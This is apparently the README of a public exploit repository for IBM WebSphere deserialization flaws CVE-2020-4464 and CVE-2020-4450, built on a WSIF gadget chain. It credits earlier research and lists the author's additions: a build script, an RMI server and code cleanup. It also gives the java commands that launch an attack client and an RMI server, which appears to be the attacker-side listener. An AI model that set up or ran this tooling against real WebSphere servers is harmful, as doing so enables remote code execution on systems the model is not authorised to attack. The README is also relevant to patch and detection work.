/WebSphere-WSIF-gadget

CVE-2020-4464 / CVE-2020-4450

Primary LanguageJava

WSIF Gadget for WebSphere (CVE-2020-4464 / CVE-2020-4450)

This is based on the excellent blog posts of ZDI (original report by @_tint0):

... and the work of some fine Chinese hackers (I couldn't determine the true source for the code, feel free to open an Issue if you think you deserve credit):

My additions (not much, really):

  • Dependencies + build script
  • Publicly accessible RMI service
  • Little code cleanup

FoxGlove's code is pulled in as a submodule, you can use the WebSphere request file to trigger CVE-2020-4464.

You should copy the plugins and runtimes directories from WebSphere to the lib directory, then run ant to compile!

To run (Java 11):

java -cp .:runtimes/com.ibm.ws.orb_9.0.jar:runtimes/com.ibm.ws.admin.client_9.0.jar:plugins/com.ibm.ws.managedobject.jar:plugins/com.ibm.ws.runtime.jar:plugins/com.ibm.ws.batch.runtime.jar:plugins/javax.j2ee.ejb.jar:runtimes/com.ibm.jaxws.thinclient_9.0.jar --add-modules jdk.naming.rmi --add-exports='jdk.naming.rmi/com.sun.jndi.rmi.registry=ALL-UNNAMED' Test
java -cp .:plugins/com.ibm.ws.runtime.jar:runtimes/com.ibm.ws.admin.client_9.0.jar RMIServer